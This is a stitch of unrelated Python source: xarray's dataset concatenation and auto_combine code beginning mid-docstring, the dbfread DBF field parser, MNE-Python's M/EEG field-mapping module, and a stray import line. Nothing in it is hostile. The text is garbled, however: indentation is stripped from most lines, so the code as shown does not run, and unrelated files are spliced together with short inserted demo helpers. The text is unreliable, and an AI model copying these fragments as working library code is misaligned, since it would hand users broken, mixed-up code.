xarray objects to concatenate together. Each object is expected to
consist of variables and coordinates with matching shapes except for
along the concatenated dimension.
dim : str or DataArray or pandas.Index
Name of the dimension to concatenate along. This can either be a new
dimension name, in which case it is added along axis=0, or an existing
dimension name, in which case the location of the dimension is
unchanged. If dimension is provided as a DataArray or Index, its name
is used as the dimension to concatenate along and the values are added
as a coordinate.
data_vars : {'minimal', 'different', 'all' or list of str}, optional
These data variables will be concatenated together:
* 'minimal': Only data variables in which the dimension already
appears are included.
* 'different': Data variables which are not equal (ignoring
attributes) across all datasets are also concatenated (as well as
all for which dimension already appears). Beware: this option may
load the data payload of data variables into memory if they are not
already loaded.
* 'all': All data variables will be concatenated.
* list of str: The listed data variables will be concatenated, in
addition to the 'minimal' data variables.
If objects are DataArrays, data_vars must be 'all'.
    coords : {'minimal', 'different', 'all' or list of str}, optional
These coordinate variables will be concatenated together:
* 'minimal': Only coordinates in which the dimension already appears
are included.
* 'different': Coordinates which are not equal (ignoring attributes)
across all datasets are also concatenated (as well as all for which
dimension already appears). Beware: this option may load the data
payload of coordinate variables into memory if they are not already
loaded.
* 'all': All coordinate variables will be concatenated, except
those corresponding to other dimensions.
        * list of str: The listed coordinate variables will be concatenated,
          in addition to the 'minimal' coordinates.
compat : {'equals', 'identical'}, optional
String indicating how to compare non-concatenated variables and
dataset global attributes for potential conflicts. 'equals' means
that all variable values and dimensions must be the same;
'identical' means that variable attributes and global attributes
must also be equal.
positions : None or list of integer arrays, optional
List of integer arrays which specifies the integer positions to which
to assign each dataset along the concatenated dimension. If not
supplied, objects are concatenated in the provided order.
indexers, mode, concat_over : deprecated
Returns
-------
concatenated : type of objs
See also
--------
merge
auto_combine
"""
# TODO: add join and ignore_index arguments copied from pandas.concat
# TODO: support concatenating scalar coordinates even if the concatenated
# dimension already exists
from .dataset import Dataset
from .dataarray import DataArray
try:
first_obj, objs = utils.peek_at(objs)
except StopIteration:
raise ValueError('must supply at least one object to concatenate')
if dim is None:
warnings.warn('the `dim` argument to `concat` will be required '
'in a future version of xarray; for now, setting it to '
"the old default of 'concat_dim'",
FutureWarning, stacklevel=2)
        dim = 'concat_dim'
if indexers is not None: # pragma: nocover
warnings.warn('indexers has been renamed to positions; the alias '
'will be removed in a future version of xarray',
FutureWarning, stacklevel=2)
positions = indexers
if mode is not None:
raise ValueError('`mode` is no longer a valid argument to '
'xarray.concat; it has been split into the `data_vars` '
'and `coords` arguments')
if concat_over is not None:
raise ValueError('`concat_over` is no longer a valid argument to '
'xarray.concat; it has been split into the `data_vars` '
'and `coords` arguments')
if isinstance(first_obj, DataArray):
f = _dataarray_concat
elif isinstance(first_obj, Dataset):
f = _dataset_concat
else:
raise TypeError('can only concatenate xarray Dataset and DataArray '
'objects, got %s' % type(first_obj))
return f(objs, dim, data_vars, coords, compat, positions)
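# Usage sketch (toy data): concatenating two datasets along an existing
# dimension simply extends that dimension.
#
#     >>> import xarray as xr
#     >>> a = xr.Dataset({'t': ('x', [1, 2])})
#     >>> b = xr.Dataset({'t': ('x', [3, 4])})
#     >>> xr.concat([a, b], dim='x')['t'].values
#     array([1, 2, 3, 4])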
def _calc_concat_dim_coord(dim):
"""
Infer the dimension name and 1d coordinate variable (if appropriate)
for concatenating along the new dimension.
"""
if isinstance(dim, basestring):
coord = None
elif not hasattr(dim, 'dims'):
# dim is not a DataArray or IndexVariable
dim_name = getattr(dim, 'name', None)
if dim_name is None:
dim_name = 'concat_dim'
coord = IndexVariable(dim_name, dim)
dim = dim_name
elif not hasattr(dim, 'name'):
coord = as_variable(dim).to_index_variable()
dim, = coord.dims
else:
coord = dim
dim, = coord.dims
return dim, coord
def _calc_concat_over(datasets, dim, data_vars, coords):
"""
Determine which dataset variables need to be concatenated in the result,
and which can simply be taken from the first dataset.
"""
def process_subset_opt(opt, subset):
if subset == 'coords':
subset_long_name = 'coordinates'
else:
subset_long_name = 'data variables'
if isinstance(opt, basestring):
if opt == 'different':
def differs(vname):
# simple helper function which compares a variable
# across all datasets and indicates whether that
# variable differs or not.
v = datasets[0].variables[vname]
return any(not ds.variables[vname].equals(v)
for ds in datasets[1:])
# all nonindexes that are not the same in each dataset
concat_new = set(k for k in getattr(datasets[0], subset)
if k not in concat_over and differs(k))
elif opt == 'all':
concat_new = (set(getattr(datasets[0], subset)) -
set(datasets[0].dims))
elif opt == 'minimal':
concat_new = set()
else:
raise ValueError("unexpected value for concat_%s: %s"
% (subset, opt))
else:
invalid_vars = [k for k in opt
if k not in getattr(datasets[0], subset)]
if invalid_vars:
raise ValueError('some variables in %s are not '
'%s on the first dataset: %s'
% (subset, subset_long_name, invalid_vars))
concat_new = set(opt)
return concat_new
concat_over = set()
for ds in datasets:
concat_over.update(k for k, v in ds.variables.items()
if dim in v.dims)
concat_over.update(process_subset_opt(data_vars, 'data_vars'))
concat_over.update(process_subset_opt(coords, 'coords'))
if dim in datasets[0]:
concat_over.add(dim)
return concat_over
def _dataset_concat(datasets, dim, data_vars, coords, compat, positions):
"""
Concatenate a sequence of datasets along a new or existing dimension
"""
from .dataset import Dataset, as_dataset
if compat not in ['equals', 'identical']:
raise ValueError("compat=%r invalid: must be 'equals' "
"or 'identical'" % compat)
dim, coord = _calc_concat_dim_coord(dim)
datasets = [as_dataset(ds) for ds in datasets]
datasets = align(*datasets, join='outer', copy=False, exclude=[dim])
concat_over = _calc_concat_over(datasets, dim, data_vars, coords)
def insert_result_variable(k, v):
assert isinstance(v, Variable)
if k in datasets[0].coords:
result_coord_names.add(k)
result_vars[k] = v
# create the new dataset and add constant variables
result_vars = OrderedDict()
result_coord_names = set(datasets[0].coords)
result_attrs = datasets[0].attrs
for k, v in datasets[0].variables.items():
if k not in concat_over:
insert_result_variable(k, v)
# check that global attributes and non-concatenated variables are fixed
# across all datasets
for ds in datasets[1:]:
if (compat == 'identical' and
not utils.dict_equiv(ds.attrs, result_attrs)):
raise ValueError('dataset global attributes not equal')
for k, v in iteritems(ds.variables):
if k not in result_vars and k not in concat_over:
raise ValueError('encountered unexpected variable %r' % k)
elif (k in result_coord_names) != (k in ds.coords):
raise ValueError('%r is a coordinate in some datasets but not '
'others' % k)
elif (k in result_vars and k != dim and
not getattr(v, compat)(result_vars[k])):
verb = 'equal' if compat == 'equals' else compat
raise ValueError(
'variable %r not %s across datasets' % (k, verb))
# we've already verified everything is consistent; now, calculate
# shared dimension sizes so we can expand the necessary variables
dim_lengths = [ds.dims.get(dim, 1) for ds in datasets]
non_concat_dims = {}
for ds in datasets:
non_concat_dims.update(ds.dims)
non_concat_dims.pop(dim, None)
def ensure_common_dims(vars):
# ensure each variable with the given name shares the same
# dimensions and the same shape for all of them except along the
# concat dimension
common_dims = tuple(pd.unique([d for v in vars for d in v.dims]))
if dim not in common_dims:
common_dims = (dim,) + common_dims
for var, dim_len in zip(vars, dim_lengths):
if var.dims != common_dims:
common_shape = tuple(non_concat_dims.get(d, dim_len)
for d in common_dims)
var = var.set_dims(common_dims, common_shape)
yield var
# stack up each variable to fill-out the dataset (in order)
for k in datasets[0].variables:
if k in concat_over:
vars = ensure_common_dims([ds.variables[k] for ds in datasets])
combined = concat_vars(vars, dim, positions)
insert_result_variable(k, combined)
result = Dataset(result_vars, attrs=result_attrs)
result = result.set_coords(result_coord_names)
if coord is not None:
        # add concat dimension last to ensure that it's in the final Dataset
result[coord.name] = coord
return result
def _dataarray_concat(arrays, dim, data_vars, coords, compat,
positions):
arrays = list(arrays)
if data_vars != 'all':
raise ValueError('data_vars is not a valid argument when '
'concatenating DataArray objects')
datasets = []
for n, arr in enumerate(arrays):
if n == 0:
name = arr.name
elif name != arr.name:
if compat == 'identical':
raise ValueError('array names not identical')
else:
arr = arr.rename(name)
datasets.append(arr._to_temp_dataset())
ds = _dataset_concat(datasets, dim, data_vars, coords, compat,
positions)
return arrays[0]._from_temp_dataset(ds, name)
def _auto_concat(datasets, dim=None):
if len(datasets) == 1:
return datasets[0]
else:
if dim is None:
ds0 = datasets[0]
ds1 = datasets[1]
concat_dims = set(ds0.dims)
if ds0.dims != ds1.dims:
dim_tuples = set(ds0.dims.items()) - set(ds1.dims.items())
concat_dims = set(i for i, _ in dim_tuples)
if len(concat_dims) > 1:
concat_dims = set(d for d in concat_dims
if not ds0[d].equals(ds1[d]))
if len(concat_dims) > 1:
raise ValueError('too many different dimensions to '
'concatenate: %s' % concat_dims)
elif len(concat_dims) == 0:
raise ValueError('cannot infer dimension to concatenate: '
'supply the ``concat_dim`` argument '
'explicitly')
dim, = concat_dims
return concat(datasets, dim=dim)
_CONCAT_DIM_DEFAULT = '__infer_concat_dim__'
def auto_combine(datasets,
concat_dim=_CONCAT_DIM_DEFAULT,
compat='no_conflicts'):
"""Attempt to auto-magically combine the given datasets into one.
This method attempts to combine a list of datasets into a single entity by
inspecting metadata and using a combination of concat and merge.
It does not concatenate along more than one dimension or sort data under any
circumstances. It does align coordinates, but different variables on
datasets can cause it to fail under some scenarios. In complex cases, you
may need to clean up your data and use ``concat``/``merge`` explicitly.
``auto_combine`` works well if you have N years of data and M data
variables, and each combination of a distinct time period and set of data
    variables is saved in its own dataset.
Parameters
----------
datasets : sequence of xarray.Dataset
Dataset objects to merge.
concat_dim : str or DataArray or Index, optional
Dimension along which to concatenate variables, as used by
:py:func:`xarray.concat`. You only need to provide this argument if the
dimension along which you want to concatenate is not a dimension in
the original datasets, e.g., if you want to stack a collection of
2D arrays along a third dimension.
By default, xarray attempts to infer this argument by examining
component files. Set ``concat_dim=None`` explicitly to disable
concatenation.
compat : {'identical', 'equals', 'broadcast_equals',
'no_conflicts'}, optional
String indicating how to compare variables of the same name for
potential conflicts:
- 'broadcast_equals': all values must be equal when variables are
broadcast against each other to ensure common dimensions.
- 'equals': all values and dimensions must be the same.
- 'identical': all values, dimensions and attributes must be the
same.
- 'no_conflicts': only values which are not null in both datasets
must be equal. The returned dataset then contains the combination
of all non-null values.
Returns
-------
combined : xarray.Dataset
See also
--------
concat
Dataset.merge
"""
from toolz import itertoolz
if concat_dim is not None:
dim = None if concat_dim is _CONCAT_DIM_DEFAULT else concat_dim
grouped = itertoolz.groupby(lambda ds: tuple(sorted(ds.data_vars)),
datasets).values()
concatenated = [_auto_concat(ds, dim=dim) for ds in grouped]
else:
concatenated = datasets
merged = merge(concatenated, compat=compat)
return merged
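# Hedged usage sketch (not part of the original module): auto_combine groups
# datasets by their data variables, concatenates each group along the inferred
# dimension, then merges the groups. Names and values are illustrative only.
def _demo_auto_combine():
    from .dataset import Dataset
    d1 = Dataset({'a': ('t', [1, 2])}, coords={'t': [0, 1]})
    d2 = Dataset({'a': ('t', [3, 4])}, coords={'t': [2, 3]})
    d3 = Dataset({'b': ('t', [5, 6, 7, 8])}, coords={'t': [0, 1, 2, 3]})
    # d1/d2 share variable 'a' and are concatenated along 't'; the result is
    # then merged with d3, which carries the other variable 'b'.
    return auto_combine([d1, d2, d3])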
|
|
"""
Parser for DBF fields.
"""
import sys
import datetime
import struct
from decimal import Decimal
from .memo import BinaryMemo
PY2 = sys.version_info[0] == 2
if PY2:
decode_text = unicode
else:
decode_text = str
class InvalidValue(bytes):
def __repr__(self):
text = bytes.__repr__(self)
if PY2:
# Make sure the string starts with "b'" in
# "InvalidValue(b'value here')".
text = 'b' + text
return 'InvalidValue({})'.format(text)
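# Illustrative sketch (not part of dbfread): InvalidValue keeps the raw bytes
# of a field that failed to parse, while the custom repr() makes such values
# easy to spot in debugging output. The helper name is hypothetical.
def _demo_invalid_value():
    value = InvalidValue(b'\xff\x00')
    return repr(value)  # "InvalidValue(b'\xff\x00')"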
class FieldParser:
def __init__(self, table, memofile=None):
"""Create a new field parser
encoding is the character encoding to use when parsing
strings."""
self.table = table
self.dbversion = self.table.header.dbversion
self.encoding = table.encoding
self.char_decode_errors = table.char_decode_errors
self._lookup = self._create_lookup_table()
if memofile:
self.get_memo = memofile.__getitem__
else:
self.get_memo = lambda x: None
def decode_text(self, text):
return decode_text(text, self.encoding, errors=self.char_decode_errors)
def _create_lookup_table(self):
"""Create a lookup table for field types."""
lookup = {}
for name in dir(self):
if name.startswith('parse'):
field_type = name[5:]
if len(field_type) == 1:
lookup[field_type] = getattr(self, name)
elif len(field_type) == 2:
                    # Hexadecimal ASCII code for the field type.
# Example: parse2B() ('+' field)
field_type = chr(int(field_type, 16))
lookup[field_type] = getattr(self, name)
return lookup
def field_type_supported(self, field_type):
"""Checks if the field_type is supported by the parser
        field_type should be a one-character string like 'C' or 'N'.
        Returns a boolean which is True if the field type is supported.
"""
return field_type in self._lookup
def parse(self, field, data):
"""Parse field and return value"""
try:
func = self._lookup[field.type]
except KeyError:
raise ValueError('Unknown field type: {!r}'.format(field.type))
else:
return func(field, data)
def parse0(self, field, data):
"""Parse flags field and return as byte string"""
return data
def parseC(self, field, data):
"""Parse char field and return unicode string"""
return self.decode_text(data.rstrip(b'\0 '))
def parseD(self, field, data):
"""Parse date field and return datetime.date or None"""
try:
return datetime.date(int(data[:4]), int(data[4:6]), int(data[6:8]))
except ValueError:
if data.strip(b' 0') == b'':
# A record containing only spaces and/or zeros is
# a NULL value.
return None
else:
raise ValueError('invalid date {!r}'.format(data))
def parseF(self, field, data):
"""Parse float field and return float or None"""
# In some files * is used for padding.
data = data.strip().strip(b'*')
if data:
return float(data)
else:
return None
def parseI(self, field, data):
"""Parse integer or autoincrement field and return int."""
        # '<i' uses the standard size, so this is 4 bytes on every platform.
return struct.unpack('<i', data)[0]
def parseL(self, field, data):
"""Parse logical field and return True, False or None"""
if data in b'TtYy':
return True
elif data in b'FfNn':
return False
elif data in b'? ':
return None
else:
# Todo: return something? (But that would be misleading!)
message = 'Illegal value for logical field: {!r}'
raise ValueError(message.format(data))
def _parse_memo_index(self, data):
if len(data) == 4:
return struct.unpack('<I', data)[0]
else:
try:
return int(data)
except ValueError:
if data.strip(b' \x00') == b'':
return 0
else:
raise ValueError(
'Memo index is not an integer: {!r}'.format(data))
def parseM(self, field, data):
"""Parse memo field (M, G, B or P)
        Looks up the memo in the memo file and returns it as a unicode
        string (or as raw bytes for binary memos), or None if missing.
"""
memo = self.get_memo(self._parse_memo_index(data))
# Visual FoxPro allows binary data in memo fields.
# These should not be decoded as string.
if isinstance(memo, BinaryMemo):
return memo
else:
if memo is None:
return None
else:
return self.decode_text(memo)
def parseN(self, field, data):
"""Parse numeric field (N)
Returns int, float or None if the field is empty.
"""
# In some files * is used for padding.
data = data.strip().strip(b'*')
try:
return int(data)
except ValueError:
if not data.strip():
return None
else:
# Account for , in numeric fields
return float(data.replace(b',', b'.'))
def parseO(self, field, data):
"""Parse long field (O) and return float."""
return struct.unpack('d', data)[0]
def parseT(self, field, data):
"""Parse time field (T)
Returns datetime.datetime or None"""
# Julian day (32-bit little endian)
# Milliseconds since midnight (32-bit little endian)
#
# "The Julian day or Julian day number (JDN) is the number of days
# that have elapsed since 12 noon Greenwich Mean Time (UT or TT) on
        # Monday, January 1, 4713 BC in the proleptic Julian calendar.
        # That day is counted as Julian day zero. The Julian day system
# was intended to provide astronomers with a single system of dates
# that could be used when working with different calendars and to
# unify different historical chronologies." - wikipedia.org
# Offset from julian days (used in the file) to proleptic Gregorian
# ordinals (used by the datetime module)
        offset = 1721425  # JDN - offset gives the proleptic Gregorian ordinal
if data.strip():
# Note: if the day number is 0, we return None
# I've seen data where the day number is 0 and
# msec is 2 or 4. I think we can safely return None for those.
# (At least I hope so.)
#
day, msec = struct.unpack('<LL', data)
if day:
dt = datetime.datetime.fromordinal(day - offset)
delta = datetime.timedelta(seconds=msec/1000)
return dt + delta
else:
return None
else:
return None
def parseY(self, field, data):
"""Parse currency field (Y) and return decimal.Decimal.
The field is encoded as a 8-byte little endian integer
with 4 digits of precision."""
value = struct.unpack('<q', data)[0]
# Currency fields are stored with 4 points of precision
return Decimal(value) / 10000
def parseB(self, field, data):
"""Binary memo field or double precision floating point number
dBase uses B to represent a memo index (10 bytes), while
Visual FoxPro uses it to store a double precision floating
point number (8 bytes).
"""
if self.dbversion in [0x30, 0x31, 0x32]:
return struct.unpack('d', data)[0]
else:
return self.get_memo(self._parse_memo_index(data))
def parseG(self, field, data):
"""OLE Object stored in memofile.
The raw data is returned as a binary string."""
return self.get_memo(self._parse_memo_index(data))
def parseP(self, field, data):
"""Picture stored in memofile.
The raw data is returned as a binary string."""
return self.get_memo(self._parse_memo_index(data))
# Autoincrement field ('+')
parse2B = parseI
# Timestamp field ('@')
parse40 = parseT
# Varchar field ('V') (Visual FoxPro)
parseV = parseC
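# Illustrative sketch (not part of dbfread): the currency (Y) encoding handled
# by parseY above is an 8-byte little-endian integer scaled by 10**4. The
# helper name is hypothetical; no table object is needed for the arithmetic.
def _demo_currency_encoding():
    raw = struct.pack('<q', 1234500)  # 123.45 stored with 4 decimal digits
    return Decimal(struct.unpack('<q', raw)[0]) / 10000  # Decimal('123.45')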
|
|
import numpy as np
from scipy import linalg
from copy import deepcopy
from ..io.constants import FIFF
from ..io.pick import pick_types, pick_info
from ..surface import get_head_surf, get_meg_helmet_surf
from ..io.proj import _has_eeg_average_ref_proj, make_projector
from ..transforms import transform_surface_to, read_trans, _find_trans
from ._make_forward import _create_coils
from ._lead_dots import (_do_self_dots, _do_surface_dots, _get_legen_table,
_get_legen_lut_fast, _get_legen_lut_accurate,
_do_cross_dots)
from ..parallel import check_n_jobs
from ..utils import logger, verbose
from ..fixes import partial
def _is_axial_coil(coil):
is_ax = coil['coil_class'] in (FIFF.FWD_COILC_MAG,
FIFF.FWD_COILC_AXIAL_GRAD,
FIFF.FWD_COILC_AXIAL_GRAD2)
return is_ax
def _ad_hoc_noise(coils, ch_type='meg'):
v = np.empty(len(coils))
if ch_type == 'meg':
axs = np.array([_is_axial_coil(coil) for coil in coils], dtype=bool)
v[axs] = 4e-28 # 20e-15 ** 2
v[np.logical_not(axs)] = 2.5e-25 # 5e-13 ** 2
else:
v.fill(1e-12) # 1e-6 ** 2
cov = dict(diag=True, data=v, eig=None, eigvec=None)
return cov
def _setup_dots(mode, coils, ch_type):
"""Setup dot products"""
my_origin = np.array([0.0, 0.0, 0.04])
int_rad = 0.06
noise = _ad_hoc_noise(coils, ch_type)
if mode == 'fast':
# Use 50 coefficients with nearest-neighbor interpolation
lut, n_fact = _get_legen_table(ch_type, False, 50)
lut_fun = partial(_get_legen_lut_fast, lut=lut)
else: # 'accurate'
# Use 100 coefficients with linear interpolation
lut, n_fact = _get_legen_table(ch_type, False, 100)
lut_fun = partial(_get_legen_lut_accurate, lut=lut)
return my_origin, int_rad, noise, lut_fun, n_fact
def _compute_mapping_matrix(fmd, info):
"""Do the hairy computations"""
logger.info('preparing the mapping matrix...')
# assemble a projector and apply it to the data
ch_names = fmd['ch_names']
projs = info.get('projs', list())
proj_op = make_projector(projs, ch_names)[0]
proj_dots = np.dot(proj_op.T, np.dot(fmd['self_dots'], proj_op))
noise_cov = fmd['noise']
# Whiten
if not noise_cov['diag']:
raise NotImplementedError # this shouldn't happen
whitener = np.diag(1.0 / np.sqrt(noise_cov['data'].ravel()))
whitened_dots = np.dot(whitener.T, np.dot(proj_dots, whitener))
# SVD is numerically better than the eigenvalue composition even if
# mat is supposed to be symmetric and positive definite
uu, sing, vv = linalg.svd(whitened_dots, full_matrices=False,
overwrite_a=True)
# Eigenvalue truncation
sumk = np.cumsum(sing)
sumk /= sumk[-1]
fmd['nest'] = np.where(sumk > (1.0 - fmd['miss']))[0][0]
logger.info('Truncate at %d missing %g' % (fmd['nest'], fmd['miss']))
sing = 1.0 / sing[:fmd['nest']]
# Put the inverse together
logger.info('Put the inverse together...')
inv = np.dot(uu[:, :fmd['nest']] * sing, vv[:fmd['nest']]).T
# Sandwich with the whitener
inv_whitened = np.dot(whitener.T, np.dot(inv, whitener))
# Take into account that the lead fields used to compute
# d->surface_dots were unprojected
inv_whitened_proj = (np.dot(inv_whitened.T, proj_op)).T
# Finally sandwich in the selection matrix
# This one picks up the correct lead field projection
mapping_mat = np.dot(fmd['surface_dots'], inv_whitened_proj)
# Optionally apply the average electrode reference to the final field map
if fmd['kind'] == 'eeg':
if _has_eeg_average_ref_proj(projs):
logger.info('The map will have average electrode reference')
mapping_mat -= np.mean(mapping_mat, axis=0)[np.newaxis, :]
return mapping_mat
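# Illustrative sketch (not part of MNE): the truncation rule used above keeps
# the smallest leading set of singular values whose cumulative mass exceeds
# 1 - miss; later components are discarded. The helper name is hypothetical.
def _demo_svd_truncation(miss=1e-4):
    sing = np.array([5.0, 3.0, 1.0, 0.5, 1e-6])
    sumk = np.cumsum(sing)
    sumk /= sumk[-1]
    return np.where(sumk > (1.0 - miss))[0][0]  # 3: the tiny component is cut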
def _map_meg_channels(inst, pick_from, pick_to, mode='fast'):
"""Find mapping from one set of channels to another.
Parameters
----------
inst : mne.io.Raw, mne.Epochs or mne.Evoked
The data to interpolate. Must be preloaded.
pick_from : array-like of int
The channels from which to interpolate.
pick_to : array-like of int
The channels to which to interpolate.
mode : str
Either `'accurate'` or `'fast'`, determines the quality of the
Legendre polynomial expansion used. `'fast'` should be sufficient
for most applications.
Returns
-------
mapping : array
A mapping matrix of shape len(pick_to) x len(pick_from).
"""
info_from = pick_info(inst.info, pick_from, copy=True)
info_to = pick_info(inst.info, pick_to, copy=True)
# no need to apply trans because both from and to coils are in device
# coordinates
coils_from = _create_coils(info_from['chs'], FIFF.FWD_COIL_ACCURACY_NORMAL,
info_from['dev_head_t'], 'meg')
coils_to = _create_coils(info_to['chs'], FIFF.FWD_COIL_ACCURACY_NORMAL,
info_to['dev_head_t'], 'meg')
miss = 1e-4 # Smoothing criterion for MEG
#
# Step 2. Calculate the dot products
#
my_origin, int_rad, noise, lut_fun, n_fact = _setup_dots(mode, coils_from,
'meg')
logger.info('Computing dot products for %i coils...' % (len(coils_from)))
self_dots = _do_self_dots(int_rad, False, coils_from, my_origin, 'meg',
lut_fun, n_fact, n_jobs=1)
    logger.info('Computing cross products for %i x %i coils...'
                % (len(coils_from), len(coils_to)))
cross_dots = _do_cross_dots(int_rad, False, coils_from, coils_to,
my_origin, 'meg', lut_fun, n_fact).T
ch_names = [c['ch_name'] for c in info_from['chs']]
fmd = dict(kind='meg', ch_names=ch_names,
origin=my_origin, noise=noise, self_dots=self_dots,
surface_dots=cross_dots, int_rad=int_rad, miss=miss)
logger.info('Field mapping data ready')
#
# Step 3. Compute the mapping matrix
#
fmd['data'] = _compute_mapping_matrix(fmd, info_from)
return fmd['data']
def _as_meg_type_evoked(evoked, ch_type='grad', mode='fast'):
"""Compute virtual evoked using interpolated fields in mag/grad channels.
Parameters
----------
evoked : instance of mne.Evoked
The evoked object.
ch_type : str
The destination channel type. It can be 'mag' or 'grad'.
mode : str
Either `'accurate'` or `'fast'`, determines the quality of the
Legendre polynomial expansion used. `'fast'` should be sufficient
for most applications.
Returns
-------
evoked : instance of mne.Evoked
The transformed evoked object containing only virtual channels.
"""
evoked = evoked.copy()
if ch_type not in ['mag', 'grad']:
raise ValueError('to_type must be "mag" or "grad", not "%s"'
% ch_type)
# pick the original and destination channels
pick_from = pick_types(evoked.info, meg=True, eeg=False,
ref_meg=False)
pick_to = pick_types(evoked.info, meg=ch_type, eeg=False,
ref_meg=False)
if len(pick_to) == 0:
        raise ValueError('No channels matching the destination channel type'
                         ' found in info. Please pass an evoked containing '
                         'both the original and destination channels. Only the'
                         ' locations of the destination channels will be used'
                         ' for interpolation.')
    mapping = _map_meg_channels(evoked, pick_from, pick_to, mode=mode)
# compute evoked data by multiplying by the 'gain matrix' from
# original sensors to virtual sensors
data = np.dot(mapping, evoked.data[pick_from])
# keep only the destination channel types
evoked.pick_types(meg=ch_type, eeg=False, ref_meg=False)
evoked.data = data
# change channel names to emphasize they contain interpolated data
for ch in evoked.info['chs']:
ch['ch_name'] += '_virtual'
evoked.info['ch_names'] = [ch['ch_name'] for ch in evoked.info['chs']]
return evoked
@verbose
def _make_surface_mapping(info, surf, ch_type='meg', trans=None, mode='fast',
n_jobs=1, verbose=None):
"""Re-map M/EEG data to a surface
Parameters
----------
info : instance of io.meas_info.Info
Measurement info.
surf : dict
The surface to map the data to. The required fields are `'rr'`,
`'nn'`, and `'coord_frame'`. Must be in head coordinates.
ch_type : str
Must be either `'meg'` or `'eeg'`, determines the type of field.
trans : None | dict
If None, no transformation applied. Should be a Head<->MRI
transformation.
mode : str
Either `'accurate'` or `'fast'`, determines the quality of the
Legendre polynomial expansion used. `'fast'` should be sufficient
for most applications.
n_jobs : int
        Number of jobs to run in parallel (requires joblib package).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
mapping : array
        An n_vertices x n_sensors array that remaps the MEG or EEG data,
as `new_data = np.dot(mapping, data)`.
"""
if not all(key in surf for key in ['rr', 'nn']):
raise KeyError('surf must have both "rr" and "nn"')
if 'coord_frame' not in surf:
raise KeyError('The surface coordinate frame must be specified '
'in surf["coord_frame"]')
if mode not in ['accurate', 'fast']:
raise ValueError('mode must be "accurate" or "fast", not "%s"' % mode)
# deal with coordinate frames here -- always go to "head" (easiest)
if surf['coord_frame'] == FIFF.FIFFV_COORD_MRI:
if trans is None or FIFF.FIFFV_COORD_MRI not in [trans['to'],
trans['from']]:
raise ValueError('trans must be a Head<->MRI transform if the '
'surface is not in head coordinates.')
surf = transform_surface_to(deepcopy(surf), 'head', trans)
n_jobs = check_n_jobs(n_jobs)
#
# Step 1. Prepare the coil definitions
# Do the dot products, assume surf in head coords
#
if ch_type not in ('meg', 'eeg'):
raise ValueError('unknown coil type "%s"' % ch_type)
if ch_type == 'meg':
picks = pick_types(info, meg=True, eeg=False, ref_meg=False)
logger.info('Prepare MEG mapping...')
else:
picks = pick_types(info, meg=False, eeg=True, ref_meg=False)
logger.info('Prepare EEG mapping...')
if len(picks) == 0:
raise RuntimeError('cannot map, no channels found')
chs = pick_info(info, picks, copy=True)['chs']
# create coil defs in head coordinates
if ch_type == 'meg':
# Put them in head coordinates
coils = _create_coils(chs, FIFF.FWD_COIL_ACCURACY_NORMAL,
info['dev_head_t'], 'meg')
type_str = 'coils'
miss = 1e-4 # Smoothing criterion for MEG
else: # EEG
coils = _create_coils(chs, coil_type='eeg')
type_str = 'electrodes'
miss = 1e-3 # Smoothing criterion for EEG
#
# Step 2. Calculate the dot products
#
my_origin, int_rad, noise, lut_fun, n_fact = _setup_dots(mode, coils,
ch_type)
logger.info('Computing dot products for %i %s...' % (len(coils), type_str))
self_dots = _do_self_dots(int_rad, False, coils, my_origin, ch_type,
lut_fun, n_fact, n_jobs)
sel = np.arange(len(surf['rr'])) # eventually we should do sub-selection
logger.info('Computing dot products for %i surface locations...'
% len(sel))
surface_dots = _do_surface_dots(int_rad, False, coils, surf, sel,
my_origin, ch_type, lut_fun, n_fact,
n_jobs)
#
# Step 4. Return the result
#
ch_names = [c['ch_name'] for c in chs]
fmd = dict(kind=ch_type, surf=surf, ch_names=ch_names, coils=coils,
origin=my_origin, noise=noise, self_dots=self_dots,
surface_dots=surface_dots, int_rad=int_rad, miss=miss)
logger.info('Field mapping data ready')
fmd['data'] = _compute_mapping_matrix(fmd, info)
    # Remove some unnecessary fields
del fmd['self_dots']
del fmd['surface_dots']
del fmd['int_rad']
del fmd['miss']
return fmd
def make_field_map(evoked, trans='auto', subject=None, subjects_dir=None,
ch_type=None, mode='fast', meg_surf='helmet',
n_jobs=1):
"""Compute surface maps used for field display in 3D
Parameters
----------
evoked : Evoked | Epochs | Raw
        The measurement file. Must have an ``info`` attribute.
trans : str | 'auto' | None
The full path to the `*-trans.fif` file produced during
coregistration. If present or found using 'auto'
the maps will be in MRI coordinates.
If None, map for EEG data will not be available.
subject : str | None
The subject name corresponding to FreeSurfer environment
variable SUBJECT. If None, map for EEG data will not be available.
subjects_dir : str
The path to the freesurfer subjects reconstructions.
It corresponds to Freesurfer environment variable SUBJECTS_DIR.
ch_type : None | 'eeg' | 'meg'
If None, a map for each available channel type will be returned.
Else only the specified type will be used.
mode : str
Either `'accurate'` or `'fast'`, determines the quality of the
Legendre polynomial expansion used. `'fast'` should be sufficient
for most applications.
meg_surf : str
Should be ``'helmet'`` or ``'head'`` to specify in which surface
        to compute the MEG field map. The default value is ``'helmet'``.
n_jobs : int
The number of jobs to run in parallel.
Returns
-------
surf_maps : list
The surface maps to be used for field plots. The list contains
separate ones for MEG and EEG (if both MEG and EEG are present).
"""
info = evoked.info
if ch_type is None:
types = [t for t in ['eeg', 'meg'] if t in evoked]
else:
if ch_type not in ['eeg', 'meg']:
raise ValueError("ch_type should be 'eeg' or 'meg' (got %s)"
% ch_type)
types = [ch_type]
if trans == 'auto':
# let's try to do this in MRI coordinates so they're easy to plot
trans = _find_trans(subject, subjects_dir)
if 'eeg' in types and trans is None:
logger.info('No trans file available. EEG data ignored.')
types.remove('eeg')
if len(types) == 0:
raise RuntimeError('No data available for mapping.')
if trans is not None:
trans = read_trans(trans)
if meg_surf not in ['helmet', 'head']:
raise ValueError('Surface to plot MEG fields must be '
'"helmet" or "head"')
surfs = []
for this_type in types:
if this_type == 'meg' and meg_surf == 'helmet':
surf = get_meg_helmet_surf(info, trans)
else:
surf = get_head_surf(subject, subjects_dir=subjects_dir)
surfs.append(surf)
surf_maps = list()
for this_type, this_surf in zip(types, surfs):
this_map = _make_surface_mapping(evoked.info, this_surf, this_type,
trans, n_jobs=n_jobs)
this_map['surf'] = this_surf # XXX : a bit weird...
surf_maps.append(this_map)
return surf_maps
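# Hedged usage sketch (not part of MNE): a typical call computing field maps
# for both channel types so they can be passed to a 3D field plot. The file
# names, subject, and condition index are hypothetical placeholders.
def _demo_make_field_map():
    from mne import read_evokeds
    evoked = read_evokeds('sample-ave.fif', condition=0)
    return make_field_map(evoked, trans='sample-trans.fif', subject='sample',
                          subjects_dir='subjects', meg_surf='helmet')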
|
|
from contextlib import contextmanager
